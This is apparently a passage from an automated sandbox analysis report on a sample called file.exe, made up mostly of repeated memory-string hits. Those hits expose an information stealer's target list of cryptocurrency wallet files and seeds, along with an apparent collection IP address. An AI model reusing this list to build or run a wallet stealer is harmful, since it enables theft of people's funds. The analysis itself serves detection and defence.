Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.jsonN
Source: file.exe, 00000000.00000002.1436568097.0000000001B5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.jsonN
Source: file.exe, 00000000.00000002.1436568097.0000000001B5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: us.wallet\info.seco
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.jsonN
Source: file.exe, 00000000.00000002.1436568097.0000000001B5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1433619231.0000000000968000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 